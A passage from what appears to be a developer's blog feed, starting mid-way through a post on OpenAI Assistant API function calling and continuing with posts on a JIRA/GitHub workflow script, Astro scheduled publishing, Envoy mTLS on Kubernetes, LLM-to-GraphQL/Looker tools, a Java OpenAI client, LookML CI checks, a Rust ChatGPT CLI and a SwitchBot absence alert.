Sequence Diagram of Chat Functionality

Although the overall process is well documented in OpenAI's official documents, a sequence diagram provides a clearer picture:

Operational Considerations

Security Concerns

When executing backend functions using argument names specified in tool_calls, it's crucial to validate these arguments, especially in multi-tenant environments. This prevents potential data leaks if an incorrect customer ID is provided. Alternatively, backend functions can be augmented with tenant IDs or other identifiers to ensure secure and appropriate execution.

Operational Notes

Pay attention to the Lifecycle of a Thread Run. It's important to handle errors and check the state of a thread before transitioning it to the next state. A thread in an in_progress state cannot be rerun, so implementing proper checks and error handling in the backend is essential for smooth operation.

Conclusion

Integrating the Assistant API with function calling in chatbot applications offers a streamlined and efficient way to handle user interactions. By maintaining context through threads, structuring responses appropriately, and ensuring secure and correct backend processing, developers can create more effective and user-friendly chatbot experiences. As always, careful consideration of the operational aspects, especially around security and state management, is crucial in deploying such systems.

JIRA and GitHub Daily Workflow Script

Thu, 18 Jan 2024 00:00:00 GMT

When managing tickets in JIRA and managing code in GitHub, the development workflow often involves the following steps:

Create a Git branch named after the JIRA ticket number.
Retrieve the ticket title from JIRA using its ticket number.
Make an empty commit in Git with the ticket number and title.
Push the branch to GitHub.
Create a draft Pull Request (PR) on GitHub and fill the PR template with the JIRA ticket link.

To simplify this process, I crafted a script that accomplishes these tasks in one go. The usage is straightforward:

./jw PRJ-1234

The script leverages go-jira/jira and the GitHub CLI. It's important to have these CLI tools set up beforehand.

Here’s an overview of the script:

#!/usr/bin/env ruby
# Fetch information from JIRA, create a branch,
# push it and create a draft PR

require 'json'
require 'tempfile'

# Retrieve the first argument
key=ARGV[0]
# If key is missing, output error
if key == nil then
  puts "Please input a key"
  exit
end
puts "Fetching information for #{key}"

info=JSON.parse(`jira view #{key} -t debug`)

parent_key=info.dig("fields", "parent", "key")
issue_summary=info["fields"]["summary"]

comment="#{key} #{issue_summary}"

# If parent_key exists, fetch information of the parent
if parent_key != nil then
  parent_info=JSON.parse(`jira view #{parent_key} -t debug`)
  parent_summary=parent_info["fields"]["summary"]
  puts "#{parent_summary}"
  comment="#{key} #{parent_summary} / #{issue_summary}"
end

puts "Starting work on #{comment}"

puts `git checkout master && git pull origin master`
# Exit if there's an error
if $? != 0 then
  puts "Failed to git pull"
  exit
end

puts `git checkout -b #{key}`

puts `git commit --allow-empty -m "#{comment}"`

# Prompt for yes/no input
def prompt_for_yes_no
  loop do
    print "Do you want to push? (yes/y/no): "

    case $stdin.gets.chomp.downcase
    when "yes"
      return true
    when "y"
      return true
    else
      return false
    end
  end
end

push_command = "git push origin #{key}"

# Open .github/PULL_REQUEST_TEMPLATE.md and embed the key in the corresponding ticket line
#
# - {{JIRA_TICKET_LINK}}
#
template_path = ".github/PULL_REQUEST_TEMPLATE.md"
template = File.read(template_path)
template.gsub!(/{{JIRA_TICKET_LINK}}/, "#{key}")
# Create a temporary file using Tempfile and write to it
pr_body = Tempfile.open do |f|
  f.write(template)
  f
end.path

# Create a DRAFT PR using the gh command
gh_command = "gh pr create --title '#{comment}' --body-file #{pr_body}  --draft"

if prompt_for_yes_no then
  puts `#{push_command}`
  # Create a DRAFT PR with the comment title using the GH command
  puts `#{gh_command}`
else
  puts "Did not push. If you want to push and create a pr, please execute the following commands"
  puts push_command
  puts gh_command
end

Key Takeaways

This time, I developed the tool using ChatGPT and GitHub Copilot. In the past, writing small tools often meant programming while searching through Google. However, using ChatGPT and GitHub Copilot, the development process has evolved into something akin to sculpting from a block of Large Language Models (LLMs), which are like a compressed representation of the internet, as mentioned in The New Yorker. Through prompts, I carve out tools that meet my specific needs, a process that feels like sculpting. This approach, much like a sculptor's craft, is an immensely enjoyable experience.

Scheduled Article Publishing in Astro with Cloudflare Pages

Tue, 16 Jan 2024 00:00:00 GMT

Astro, a powerful framework for building modern websites, offers efficient static build capabilities. In collaboration with Cloudflare Pages, it provides a robust hosting solution. An intriguing feature I wanted to implement on my blog (hosted on Cloudflare Pages and built with Astro) was scheduled article publishing. This feature allows articles to be automatically published when the current date matches their predefined publication date.

Strategy for Scheduled Publishing

To achieve scheduled article publishing, I employed a two-step approach:

1. Adding `publishDate` Metadata to Content Collection

Firstly, I added a publishDate metadata field to the content collection. This date determines when an article should be published. By checking if this date matches the current date, the system decides whether to publish the post. Astro's documentation on content collections and handling dates was instrumental in implementing this.

2. Modifying the Build Script for Date Comparison

Secondly, I modified the build script to include a function that compares the publishDate with the build date. This function filters out any posts that are marked as drafts or have a future publish date. The TypeScript code snippet below illustrates this process:

/** Filters out draft posts based on the environment and the post's publishDate **/
export async function getAllPosts() {
 return await getCollection("post", ({ data }) => {
  const isNotDraft = import.meta.env.PROD ? data.draft !== true : true;
  // Treat posts with a future publishDate as drafts
  const isNotFuture = import.meta.env.PROD
   ? data.publishDate.valueOf() <= new Date().valueOf()
   : true;

  return isNotDraft && isNotFuture;
 });
}

Automating Deployment with Cloudflare Pages and GitHub Actions

To ensure that this scheduled publishing mechanism works effectively, I automated the build and deployment process of the site. Cloudflare Pages offers a feature called Deploy Webhook, which triggers the build and deployment of pages when it receives a POST request. I utilized GitHub Actions to send this POST request to the Deploy Webhook daily. Below is an example YAML configuration for the GitHub Actions workflow:

# Only articles with a past or present publishDate are displayed in the Astro build
# Thus, we perform a daily deployment with a date condition check

name: "Daily Deploy"

on:
  # daily at 00:00 UTC
  schedule:
    - cron: "0 0 * * *"
  # for debugging purposes
  workflow_dispatch:

jobs:
  # Trigger deploy webhook with curl
  deploy:
    runs-on: ubuntu-latest
    steps:
      - name: Deploy
        run: curl -X POST -d {} ${{ secrets.CLOUDFLARE_DEPLOY_WEBHOOK }}

This setup guarantees that the website is rebuilt daily, ensuring that any article with the current date as its publishDate gets published automatically. This approach leverages the static build performance of Astro while introducing dynamic elements like scheduled publishing, making the blog more efficient.

Securing k8s Service Communication with Envoy

Sun, 14 Jan 2024 08:00:00 GMT

Introduction

In this article, I'll introduce an example of implementing secure service-to-service communication using Envoy. The motivation for this experiment was to secure gRPC communications within a Kubernetes (k8s) cluster. While it's possible to implement secure authentication at the application layer, achieving this at the infrastructure layer can reduce the concerns in application implementation, offering significant benefits.

For this experiment, I tried communication using client certificate authentication. The code for this experiment is stored in the following GitHub repository:

github.com/ainoya/envoy-mtls-demo

The setup for the sample realized in k8s involved using Envoy as a sidecar in k8s. The communication structure was between a client-side pod (application container + Envoy sidecar container) and a server-side pod (Envoy sidecar container + application container).

Implementing mTLS with Envoy

Generating Client Certificates

Generating client certificates is straightforward using cfssl.

Generating Server Certificates

Envoy Configuration

To ensure that only specific client certificates are accepted in Envoy, use validation_context and match_typed_subject_alt_names.

First, create a Certificate Authority (CA):

# Example CA creation
$ cat certs/ca/ca-csr.json
{
    "CN": "app-ca",
    "hosts": [""],
    "key": {
        "algo": "ecdsa",
        "size": 256
    },
    "names": [
        {
            "O": "app-ca",
            "OU": "development",
            "ST": "Tokyo",
            "C": "JP"
        }
    ],
    "ca": {
        "expiry": "876000h"
    }
}

# Create the CA key and certificate with cfssl, cfssljson
cd certs/ca
cfssl genkey -initca ca-csr.json | cfssljson -bare ca

Next, generate server certificates using this CA:

# Example server certificate creation
$ cat certs/server/server-config.json
{
  "signing": {
    "default": {
      "expiry": "876000h",
      "usages": [
        "signing",
        "key encipherment",
        "server auth"
      ]
    }
  }
}

$ cat certs/server/server.json
{
  "CN": "app-internal-api",
  "hosts": [""],
  "key": {
    "algo": "ecdsa",
    "size": 256
  },
  "names": [
    {
      "ST": "Tokyo",
      "C": "JP"
    }
  ]
}

cd certs/server
cfssl gencert -ca=../ca/ca.pem -ca-key=../ca/ca-key.pem \
  -config=./server-config.json server.json | cfssljson -bare server

Finally, generate client certificates that will communicate with this server:

$ cat certs/client/client-config.json
{
  "signing": {
    "default": {
      "expiry": "876000h",
      "usages": [
        "signing",
        "key encipherment",
        "client auth"
      ]
    }
  }
}

$ cat certs/client/client.json
{
  "CN": "appclient",
  "hosts": ["app-internal-api"],
  "key": {
    "algo": "ecdsa",
    "size": 256
  },
  "names": [
    {
      "ST": "Tokyo",
      "C": "JP"
    }
  ]
}

Point to note: The hosts section should be set with names to be validated by match_typed_subject_alt_names.

cd certs/client
cfssl gencert -ca=../ca/ca.pem -ca-key=../ca/ca-key.pem \
  -config=./client-config.json client.json | cfssljson -bare client

With match_typed_subject_alt_names, requests trying to authenticate with a client certificate that doesn't match the host name will be rejected with a CERTIFICATE_VERIFY_FAILED error.

For more detailed examples of Envoy configuration, refer to the demo repository:

Manifest Configuration for Deployment in k8s

For configuring the client-side k8s manifest, consider the following setup:

Include processes that terminate the sidecar when the main container exits.
- Share an emptyDir volume between the main container and the sidecar container, and create a file upon exit of the main container. The sidecar should terminate itself upon detecting this file.
- From k8s 1.28 onwards, use initContainer and restartPolicy:Always to avoid such configurations. Kubernetes v1.28: Introducing native sidecar containers
Ensure that the application starts after the sidecar is ready.
Here's an excerpt of the configuration:

            - name: app
     ...
              command:
                - /bin/bash
                - -c
                # 1. Set up a trap to terminate the envoy sidecar after the batch process ends.
                # 2. Simple waiting process until Envoy starts
                - trap "touch /tmp/pod/main-terminated" EXIT && while ! nc -z 0.0.0.0 2443; do echo "Waiting for the envoy sidecar to be up..."; sleep 1; done && /path/your/application-command $@
                - --
              args:
                - # application args
            - name: envoy
              image: envoyproxy/envoy:v1.28-latest
              command:
                - /bin/sh
                - -c
              args:
                - |
                  envoy \
                   -c /etc/envoy/client-conf.yaml &
                   CHILD_PID=$!
                   (while true; do if [[ -f "/tmp/pod/main-terminated" ]]; then kill $CHILD_PID; echo "Killed $CHILD_PID as the main container terminated."; fi; sleep 1; done) &
                   wait $CHILD_PID
                   if [[ -f "/tmp/pod/main-terminated" ]]; then exit 0; echo "Job completed. Exiting..."; fi

gRPC Load Balancing

gRPC communicates over an established TCP connection, which can lead to load imbalances if the connections are unevenly distributed across backend servers.
Normally, k8s services function as L4 load balancers and cannot manage L7 load distribution.
To address this, start k8s services in headless mode and let Envoy handle the load balancing. In this setup, the Envoy sidecar container on the client side plays this role.

Conclusion

Further Developments

For large-scale applications of this mTLS setup, consider using AWS AppMesh or Istio, which can automate configurations.
- Sidecar configurations can be automatically injected using a mutating webhook.
  - Example with AppMesh: SidecarInjection - AWS App Mesh Controller
- Integration of Istio with Vault can automate certificate issuance.
  - Istioldie 1.2 / Istio Vault CA Integration

This article aimed to provide practical insights into setting up secure service-to-service communication within a Kubernetes cluster using Envoy and mTLS. Feel free to refer to the provided repository for a hands-on demonstration and detailed　configuration examples.

References

What is mTLS? | Mutual TLS | Cloudflare

Enhancing Tools with OpenAI API: Insights from Past Projects

Wed, 10 Jan 2024 00:00:00 GMT

Early in the previous year, following the launch of OpenAI's GPT-3.5, I initiated a project to improve existing tools' user experience using the OpenAI API. This article focuses on two significant instances from this project.

Transforming Unstructured Data into Structured, Machine-Readable Formats

One of the key features I focused on was the ability to easily convert unstructured data into structured, machine-readable formats like JSON. This capability was utilized in two distinct applications, both of which were rapidly prototyped using LangChain and Streamlit.

Example 1: ainoya/graphql-gpt

Converting Natural Language Queries into GraphQL

The aim was to transform natural language questions into GraphQL queries.
In-context learning was employed, embedding the GraphQL schema within the prompt, to facilitate this conversion.
Additionally, the implementation included executing the resulting queries and retrieving results from a GraphQL server. A protective layer for query execution would likely be necessary to prevent data retrieval beyond the intended scope in real-world applications.

Example 2: ainoya/gpt-looker

Natural Language to Looker Queries

Similar to the first example, this project involved converting natural language questions into Looker queries.
LookML schemas were embedded in the prompt for in-context learning responses.
Due to the size of LookML definitions, there was a challenge of context overflow when included directly in the prompt. This was addressed by preprocessing LookML into segments, converting them into embeddings, and storing them on Chroma. During a query, the most relevant schema was searched and retrieved, a technique known as Retrieval Augmented Generation (RAG).
Given that Looker is a Google product, I anticipate similar functionalities may be implemented in tools like Gemini by Google DeepMind.

Conclusion

The experimentation highlighted the astonishing ease with which unstructured data processing, previously demanding specialized machine learning expertise, can now be implemented. Recent developments, like the Code Interpreter by OpenAI, further simplify the implementation of such AI-enhanced service experiences, promising widespread adoption and continuous improvement in the field.

Developing an OpenAI Java API Client

Mon, 08 Jan 2024 00:00:00 GMT

Last year in November, I took on the task of developing a Java API client for OpenAI's ChatGPT Assistant API, as there was a notable absence of such a tool for Java developers. The result of this endeavor is hosted on GitHub - ainoya/openai-java-generated-client.

Utilizing OpenAI's API Specification

The project was inspired by OpenAI's publicly shared API specification on GitHub - openai/openai-openapi. This led me to explore the potential of automating the client generation using the OpenAPI Generator.

Encountered Challenges

Spec vs. Reality

A significant challenge arose from discrepancies between the OpenAI specification and its actual implementation. Mismatches in response key names necessitated direct API calls for correction, resulting in a modified API specification available at openapi.yaml. The Assistant API functions well now, though other parts may still require updates.

Mastering OpenAPI Generator Options

Deciphering the options available in openapi-generator required thorough research and understanding, aided by the official documentation.

The Effective Docker Command

Running the OpenAPI Generator in Docker proved most efficient. The finalized command for generating the client is:

docker run --rm -v ${PWD}:/local openapitools/openapi-generator-cli:v7.1.0 generate \
    -i /local/openapi.yaml --template-dir=/local/custom_template \
    -g java \
    --additional-properties=disallowAdditionalPropertiesIfNotPresent=false,artifactId=openai-java-generated-client,groupId=com.github.ainoya,invokerPackage=com.github.ainoya.client,modelPackage=com.github.ainoya.client.model,developmerName="Naoki Ainoya",developerEmail="xxx",developerOrganization="ainoya.dev",developerOrganizationUrl="https://ainoya.dev",artifactVersion=0.0.3 \
    --api-package com.github.ainoya.openai.client.api \
    -o /local/ && \
    ./gradlew test

Auto-Generated Unit Testing

The OpenAPI Generator's capability to auto-generate unit tests was highly beneficial. The command includes running ./gradlew test after generation, enabling quick identification of any issues.

Opting for JitPack over GitHub Packages

While initially considering GitHub Packages, its constraints did not align with my usage requirements. Consequently, I opted for JitPack, which proved more suitable for my needs. The API client is available at JitPack - ainoya/openai-java-generated-client. The need for a Private Access Token (PAT) even for public packages on GitHub Packages was a deciding factor, as elaborated in GitHub Community Discussion #25629.

Automating LookML Code Review with lkml and GitHub Actions

Sun, 07 Jan 2024 00:00:00 GMT

In the world of data analytics, Looker has become an indispensable tool for many teams. Its core feature, LookML, allows users to define data models and manage projects efficiently through Git. This setup facilitates team development by enabling version control and collaborative work. However, as teams grow, ensuring adherence to specific LookML coding standards becomes increasingly challenging, especially during code reviews.

A particularly useful tool in this context is Spectacles, which assists in validating LookML code. Yet, there are times when teams require custom static analysis to enforce specific coding practices. This is where the lkml Python library comes into play, providing an easy way to create custom static analysis scripts.

For instance, consider a team wanting to enforce a consistent data protection policy across all LookML explore definitions by using access_filter. The lkml library enables the creation of a Python script to check this automatically.

Here's an example script that parses LookML files, identifies explore definitions, and checks for the presence of specific access_filter settings:

# Script to parse LookML and check for issues with access_filter
# To be used in CI
import lkml
import pprint
import glob

for lkml_file_path in glob.glob('**/*.lkml', recursive=True):
    with open(lkml_file_path) as file:
        print("reading: {}".format(lkml_file_path))
        result = lkml.load(file)
        if not 'explores' in result:
            print("{} does not contain explore definitions. Skipping check for access_filter conditions.".format(lkml_file_path))
            continue
        else:
            print("{} contains explore definitions. Checking access_filter conditions.".format(lkml_file_path))

        for explore in result['explores']:
            print("Checking access_filter conditions for explore name: {}".format(explore['name']))
            try:
                access_filter = explore['access_filters'][0]
                pprint.pprint(access_filter)
                if access_filter['user_attribute'] != 'tenant_id':
                    raise Exception("Please specify user_attribute: tenant_id in access_filter conditions. There are issues with the scope of data exposure.")
            except KeyError:
                raise Exception("Please set access_filter conditions in explore. There are issues with the scope of data exposure.")
            print("ok")

This script can be integrated into a continuous integration (CI) pipeline, offering a more efficient and reliable way to ensure coding standards than manual code reviews. For teams managing their code repositories on GitHub, this script can be easily incorporated into their workflow using GitHub Actions.

Below is a sample GitHub Actions workflow definition that automates the execution of the script upon every push to the repository:

name: lookml test

on:
  push:

jobs:
  lookml-test:
    name: lookml-test
    timeout-minutes: 10
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v3.3.0
    - name: Set up Python ${{ matrix.python-version }}
      uses: actions/setup-python@v4
      with:
        python-version: "3.10"
    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        pip install lkml
    - name: Test
      run: |
        python scripts/lkml_validator/test.py

This setup not only saves time but also enhances the reliability of code reviews by automating the validation of access_filter configurations in LookML files. It's a practical example of how tools like lkml and GitHub Actions can streamline development processes in the data analytics domain.

Exploring AI CLI Tool Development with Rust: GIGO

Sat, 06 Jan 2024 00:00:00 GMT

Introduction

In the dynamic world of software engineering, the integration of efficient tools can significantly streamline the workflow. With the advent of AI-powered solutions like ChatGPT, there's a growing need for accessible interfaces to interact with these systems. My recent project, a command-line interface (CLI) tool named GIGO, is a testament to this requirement and my personal journey into Rust programming.

The Genesis of GIGO

Identifying the Need: As a software engineer, I often found myself in situations where I needed quick, dummy inputs for testing or various tasks. A direct, terminal-based tool to interact with ChatGPT seemed like an ideal solution.
Why Rust?: Despite having no prior experience with Rust, my curiosity to explore this language was the driving force behind this project. Rust, known for its safety and performance, seemed like a fitting choice for a tool that would interact with AI models.

Building GIGO

The Project: I embarked on creating GIGO, a minimalist CLI tool, which you can find on GitHub at ainoya/gigo.
Functionality: While GIGO's features are currently limited, it efficiently serves its primary function. Inspired by the phrase "garbage in, garbage out," I chose this name to add a touch of humor. The tool allows users to input prompts via CLI, which then return responses from ChatGPT.

Usage Example:

echo 'Please write a short story about a robot who is trying to learn how to be a human.' | gigo

Once upon a time, ...

Reflections and Future Prospects

Rust Experience: Although I've only scratched the surface of Rust's capabilities, I found its pattern matching and type-safe error handling to be particularly appealing. An example can be seen in the project's code (here).
GIGO's Potential: Currently, GIGO interfaces solely with OpenAI's API. However, I believe enhancing its compatibility with various large language models could make it more versatile and interesting.

Conclusion

My foray into developing GIGO has been both a learning curve and a step towards addressing a niche requirement in the software engineering domain. While it's a small-scale project, the potential for GIGO to evolve and integrate more features is something I look forward to exploring. This journey has not only provided me with a practical tool but also a valuable introduction to Rust programming.

Absence Alert System using SwitchBot

Wed, 03 Jan 2024 00:00:00 GMT

Enhancing Home Security with a Custom-Built Motion Detection Alert System using SwitchBot and Cloudflare Workers

As smart home technologies evolve, the need for more sophisticated monitoring systems becomes apparent. While standard motion sensors, like those from SwitchBot, are great at detecting movement and triggering immediate actions, they often lack the capability to alert users about the absence of motion for extended periods. This is crucial in scenarios where non-activity can be as significant as activity, such as monitoring the well-being of elderly relatives or ensuring that a seldom-used space remains undisturbed.

To address this, I've developed an innovative system using SwitchBot's motion detection capabilities, combined with the power of Cloudflare Workers, to create an alert mechanism for both motion detection and the lack of it over extended periods, specifically beyond the 30-minute mark, which is the limit in SwitchBot's default settings.

How the System Works

Extended Absence Detection: The SwitchBot sensors are excellent at motion detection, but they can't natively send alerts for periods of inactivity longer than 30 minutes. My system overcomes this by using Cloudflare Workers alongside the SwitchBot API to detect absence of motion over intervals longer than 30 minutes.
Integration with Cloudflare Workers: Upon detecting motion, the SwitchBot sensor triggers a webhook request to Cloudflare Workers. These Workers then log the time of the motion event in Cloudflare's Key-Value (KV) storage system.
Scheduled Checks and Notifications: A scheduled Cloudflare Worker periodically checks the last recorded motion timestamp in the KV store. If it detects that no motion has been recorded for over 6 hours, it triggers a notification.
Utilizing Pushover for Alerts: For sending notifications, I chose Pushover – a convenient app for sending push notifications to smartphones. It's ideal for personal systems where you want to integrate push notifications easily.

Development and Resources

The implementation was guided by the official API documentation of SwitchBot (SwitchBot API) and Cloudflare Workers (Cloudflare Workers Documentation). The ease of use of Cloudflare Workers, particularly for setting up web APIs and using the KV store for data persistence, made it an excellent choice for this project. The deployment process was streamlined thanks to well-organized Wrangler commands.

Conclusion

This project showcases how combining existing smart home devices with powerful cloud services like Cloudflare Workers can result in highly functional and customized home security solutions. The ability to monitor both presence and absence of motion opens up new avenues for home monitoring, ensuring peace of mind when it comes to the safety and security of our homes and loved ones.

The implementation details, code are available on my GitHub repository. I welcome fellow enthusiasts to explore, fork, and adapt this system to their requirements.

My first post

Sat, 30 Dec 2023 00:00:00 GMT

I wanted to share a small update about some changes I've made to my website recently.

Switching Domains to Cloudflare

I've moved my domains, ainoya.dev and ainoya.io, over to Cloudflare. This is a step towards improving the overall performance of my website.

Hosting with Cloudflare Pages

In addition to the domain migration, my website is now hosted on Cloudflare Pages. This change is primarily for ease of maintenance and better integration with my existing setup. I'm hoping that this move will make the website more efficient and user-friendly.

Built with Astro

For the website's framework, I've chosen Astro. I'm using the Cactus theme from Astro's collection, which can be found here: Cactus Theme on GitHub. It's a simple yet effective theme that suits the content and structure of my site.

Content Focus

Going forward, the blog will mainly feature posts about things I learn in the tech field. This could include new programming concepts, insights into different technologies, or updates on personal projects. The idea is to share knowledge and experiences in a straightforward and accessible way.

I'm looking forward to this new phase and hope you find the posts informative and interesting. Feel free to reach out if you have any thoughts or questions.

Thank you for reading!